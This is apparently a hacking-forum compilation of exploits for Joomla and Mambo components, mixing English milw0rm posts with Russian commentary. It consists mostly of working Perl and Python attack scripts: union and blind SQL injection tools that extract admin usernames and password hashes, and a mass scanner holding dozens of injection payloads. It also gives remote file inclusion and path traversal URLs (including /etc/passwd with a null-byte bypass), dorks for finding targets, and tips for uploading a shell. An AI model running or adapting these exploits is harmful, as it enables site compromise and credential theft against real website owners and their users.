[[// website : www.dumenci.net -
[[================================================== ======================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_news_portal&Itemid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}


$target = "-1%20union%20select%20111,concat(char(117,115,101,1 14,110,97,109,101,58),username,char(112,97,115,115 ,119,111,114,100,58),password),333%20from%20jos_us ers/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+************************************************* *********************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)border/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print "+************************************************* *********************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print "+************************************************* *********************+\n";
exit();
}
}

# milw0rm.com [2008-06-09]

milw0rm.com [2008-06-09]

Mambo Component galleries v 1.0 Remote SQL Injection


#!/usr/bin/perl -w

# Mambo Component galleries v 1.0 Remote SQL Injection #
########################################
# Found by : Houssamix From H-T Team
# H-T Team [ HouSSaMix + ToXiC350 ]
# Greetz : bugtr4cker & Stack & HaCkeR_EgY & Hak3r-b0y & All friends & All muslims HaCkeRs :)
# Script_Name: "Mambo"
# Component_Name: galleries v 1.0
########################################
# <mosinstall type="component">
# <name>galleries</name>
#<creationDate>10/04/2006</creationDate>
#<author>Vinay Kr. Singh</author>
#<copyright>This component is released under the GNU License</copyright>
#<authorEmail>vinay.singh@yahoo.com</authorEmail>
#<authorUrl>www.opensource.com</authorUrl>
#<version>1.0</version>


system("color f");
print "\t\t############################################## ##########\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t############################################## ##########\n\n";
print "\t\t# Mambo Component galleries 1.0 Remote SQL Injection #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t############################################## ##########\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/mambo/): ";
chomp(my $target=<STDIN>);

$uname="username";
$passwd="password";
$magic="mos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "/index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115, 101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){

print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# codec by Houssamix From H-T Team

# milw0rm.com [2008-06-13]


milw0rm.com [2008-06-13]

Mambo <= 4.6.4 Remote File Inclusion Vulnerability

.-----------------------------------------------------------------------------.
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |
| download: http://mambo-foundation.org/ |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: all friends ;) |
'-----------------------------------------------------------------------------'

# code:

/includes/Cache/Lite/Output.php :
1 <?php
2
3 /**
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.
5 *
6 * There are some examples in the 'docs/examples' file
7 * Technical choices are described in the 'docs/technical' file
8 *
9 * @package Cache_Lite
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11 * @author Fabien MARTY <fab@php.net>
12 */
13
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
...

^ no comment.. RFI in line 14..

# exploit:

http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?

# milw0rm.com [2008-06-13]

milw0rm.com [2008-06-13]

Joomla components AstatsPro:

/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(username,pas sword,0x2e,usertype)+from+jos_users+limit+2,1--

Залезть в пхпмайадмин можно узнав пароль с помощью JoomlaXplorer (если таковой установлен), после добычи пароля заходим в компонент JoomlaXplorer, далее ищем configuration.php и читаем логин и пасс от БД.

Залить шелл также можно с помощью етого компонента.

Joomla Component expshop Remote SQL injection

Уязвимость:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}

Пример:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--

# milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893

Joomla Component com_facileforms 1.4.4

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «ff_compath» сценарием facileforms.frame.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:

www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]

/path/components/com_facileforms/facileforms.frame.php?ff_compath=[SH3LL]

Mambo Component Articles Blind SQL Injection 0-day Exploit by Ded MustD!e


#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## #####################\n";
print " # Mambo Component Articles Blind SQL Injection Exploit #\n";
print " # Author:Ded MustD!e [www.antichat.ru] #\n";
print " # #\n";
print " # Dork : inurl:option=articles artid #\n";
print " # Usage: perl exploit.pl host path <options> #\n";
print " # Example: perl exploit.pl www.host.com /joomla/ -a 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -a valid Article id #\n";
print " ################################################## #####################\n";
exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $aid = $ARGV[2];

my %options = ();
GetOptions(\%options, "u=i", "p=s", "a=i");

print "[~] Exploiting...\n";

if($options{"u"})
{
$userid = $options{"u"};
}

if($options{"a"})
{
$aid = $options{"a"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $aid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $aid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=articles&task=viewarticle&artid=".$aid." and ascii(SUBSTRING((SELECT password FROM mos_users LIMIT 0,1),".$i.",1))=".$h."";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Back";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

Joomla Component netinvoice Remote SQL injection
POC : http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid={SQL}

Example: http://localhost/[Joomla_Path]/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48 FROM jos_users--


(c)milw0rm.com

Author : His0k4 [ALGERIAN HaCkEr]

Dork : inurl:com_beamospetition

POC : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet={SQL}

Example : http://localhost/[Joomla_Path]/index.php?option=com_beamospetition&pet=-5 UNION SELECT user(),user(),user(),user(),user(),user(),user(),c oncat(username,0x3a,password),user(),user(),user() ,user(),user(),user(),user() FROM jos_users--

------------------------------------------------------------------------
# milw0rm.com [2008-06-28]

Mambo Component n-gallery SQL Injection

DORK : allinurl:"com_n-gallery"

index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mo s_users/*


milw0rm.com [2008-06-30]

и еще
Joomla Component Xe webtv Blind SQL Injection Exploit


#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## ##############\n";
print " # Joomla Component Xe webtv Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # http://www.palcastle.org/cc #\n";
print " # #\n";
print " # Dork: inurl:com_xewebtv #\n";
print " # Usage: perl xewebtv.pl host path <options> #\n";
print " # Example: perl xewebtv.pl www.host.com /joomla/ -t 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid tv id #\n";
print " # -c Category value of the following id #\n";
print " # Note: #\n";
print " # You can change the match string if you need that #\n";
print " ################################################## ##############\n";

exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $tid = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "p=s", "t=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
$cid = $options{"c"};
}

if($options{"t"})
{
$tid = $options{"t"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $tid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $tid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_xewebtv&Itemid=60&func=detail&id=".$tid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-06-28]

MamScan v1.0
Mambo Component SQL scanner
#!/usr/bin/python
#Mambo Component SQL scanner, checks source for md5's

#Uncomment line 44 for verbose mode. If md5 found
#check manually.

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, urllib2, re, time

print "\n\t d3hydr8[at]gmail[dot]com MamScan v1.0"
print "\t------------------------------------------"

sqls = ["index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*",
"index.php?option=com_catalogshop&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12, concat(username)/**/from/**/mos_users/*",
"index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*",
"index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8 ,9,10,11,12,13,14%20from%20mos_users--",
"index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0 x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*",
"index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5 ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*",
"index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*",
"index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN",
"index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*",
"index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*", "index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users",
"index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null ,null,null,null,null/**/from/**/mos_users/*",
"index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*",
"index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*",
"index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users",
"index.php?option=com_rapidrecipe&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_rapidrecipe&category_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*",
"index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2 F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F %2A%2A%2Ffrom%2F%2A%2A%2Fjos_users",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),0x3a/**/from/**/jos_users/*",
"index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--",
"index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--",
"administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*",
"index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*",
"index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0, 0,1,1,1,1,2,2,2/**/from/**/jos_users/*",
"index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,conca t(username,0x3a,password)/**/from/**/jos_users/*",
"index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0 ,username+from%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0 x3a,password),5+from+mos_users/*",
"index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*",
"index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*",
"index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--",
"index.php?option=com_accombo&func=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*",
"index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*",
"index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117 ,115,101,114,62),username,CHAR(60,117,115,101,114, 62))from/**/mos_users/**",
"index.php?option=com_galleries&id=10&aid=-1%20union%20select%201,2,3,concat(CHAR(60,117,115, 101,114,62),username,CHAR(60,117,115,101,114,62))f rom/**/mos_users/**",
"index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),passwo rd)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mo s_users/*",
"index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)K HG+from+mos_users--"]

if len(sys.argv) != 2:
print "\nUsage: ./mamscan.py <site>"
print "Ex: ./mamscan.py www.test.com\n"
sys.exit(1)

host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
host = host+"/"
if host[:7] != "http://":
host = "http://"+host

print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls)

print "[+] Starting Scan...\n"
for sql in sqls:
time.sleep(3) #Change this if needed
#print "[+] Trying:",host+sql.replace("\n","")
try:
source = urllib2.urlopen(host+sql.replace("\n","")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >= 1:
print "[!]",host+sql.replace("\n","")
for md5 in md5s:
print "\n[+]MD5:",md5
except(urllib2.HTTPError):
pass
print "\n[-] Done\n"

Joomla Component altas v 1.0 Multiple Remote SQL Injection


#!/usr/bin/perl -w
# Dork : index.php?option=com_altas
system("color f");
print "\t\t============================================== ==========\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t============================================== ==========\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection #\n\n";
print "\t\t============================================== ==========\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350] #\n\n";
print "\t\t============================================== ==========\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
chomp(my $target=<STDIN>);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,10 1,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){

print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Exploit succeed! #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# coded by Houssamix From H-T Team

# milw0rm.com [2008-07-04]

Component Agora Forum 1.0.4 Acropolis rus

vuln code:
/moderate.php
$result = $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1');
vuln code:
/my_uploads.php
$db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE__, __LINE__, $db->error());
Download:
http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/
;)

ZAMUT (c)

Joomla Component DT Register Remote SQL injection


Author: His0k4 [ALGERIAN HaCkeR]

Dork: inurl:com_DTRegister eventId

Vendor:http://www.dthdevelopment.com/components/dt-register.html

POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12
UNION SELECT concat(username,0x3a,password) FROM
jos_users&task=pay_options&Itemid=138

Greetings : All friends & muslims HaCkeRs
www.dz-secure.com

----------------------------------------------------------------------------

# milw0rm.com [2008-07-16]

Продукт-Joomla
Компонент -wap4joomla
found by ImpLex & Microsoft Sam
exploit
#!/usr/bin/perl -w
print
"\t\t
################################################## ##############
############ This exploit created by ImpLex ICQ: 444-979 #######
############ from WHACK.RU #######
############ WHACK.RU #######
############ wapmain.php remote sql injection exploit #######
############ LETS GO!!!! #######
################################################## ##############\n\n";
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
chomp(my $table1=<STDIN>);


print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,userna me,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 +from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
print "\n[+] User;password : $1";
print "\n[+] password = md5(md5:salt) or md5";
print "\n[+] target has been hacked";
print "\n[+] If password-md5(md5:salt) => Then user - admin";
print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}

компонент com_imagebrowser

просматриваем директории на сервере ;)

пример:
index.php?option=com_imagebrowser&folder=../../../../

Joomla Component EZ Store Blind SQL Injection Exploit

#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
print " \n";
print " ################################################## ##############\n";
print " # Joomla Component EZ Store Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.dz-secure.com #\n";
print " # #\n";
print " # Dork: inurl:com_ezstore #\n";
print " # Usage: perl ezstore.pl host path <options> #\n";
print " # Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2 #\n";
print " # #\n";
print " # Options: #\n";
print " # -t Valid procuct id #\n";
print " # -c Category value of the following product id #\n";
print " ################################################## ##############\n";

exit;
}

my $host = $ARGV[0];
my $path = $ARGV[1];
my $cid = $ARGV[2];
my $pid = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
$cid = $options{"c"};
}

if($options{"p"})
{
$pid = $options{"p"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $cid, $pid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}

print "\n[~] Exploiting done\n";

sub istrue2
{
my $host = shift;
my $path = shift;
my $cid = shift;
my $pid = shift;
my $i = shift;
my $h = shift;

my $ua = LWP::UserAgent->new;
my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

if($options{"x"})
{
$ua->proxy('http', "http://".$options{"x"});
}

my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "viewcategory&catid=".$cid."";

if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}

}

# milw0rm.com [2008-08-03]

Agora 1.0.4 Acropolis Rus
google-> inurl: option=com_agora

$task = trim( mosGetParam( $_REQUEST, 'task', "" ) );

if ($task)
{
require ($agora_path . "/$task.php");
}
else
{
require ($agora_path . "/index.php");
}

null байт не прокатит из-за trim, можно подключать аминские скритпты в которых нет проверки, единственный плюс обходим _VALID_MOS в скриптах,
также пригодится если на жертве есть другие скрипты или если кривые настройки на серваке пожно инклюдить скрипты у соседей

null байт не прокатит из-за trim,
да щас прям - http://php.su/functions/?trim

../../../../../../../../etc/./passwd%00fucked_trim_bypass

Joomla 1.5.x Remote Admin Password Change


File : /components/com_user/controller.php

################################################## ###################################
Line : 379-399

function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );

// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model
$model = &$this->getModel('Reset');

// Verify the token
if ($model->confirmReset($token) === false) < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED ', $model->getError());
$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
return false;
}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
}

################################################## ###################################

File : /components/com_user/models/reset.php

Line: 111-130



function confirmReset($token)
{
global $mainframe;

$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}

// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}

// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
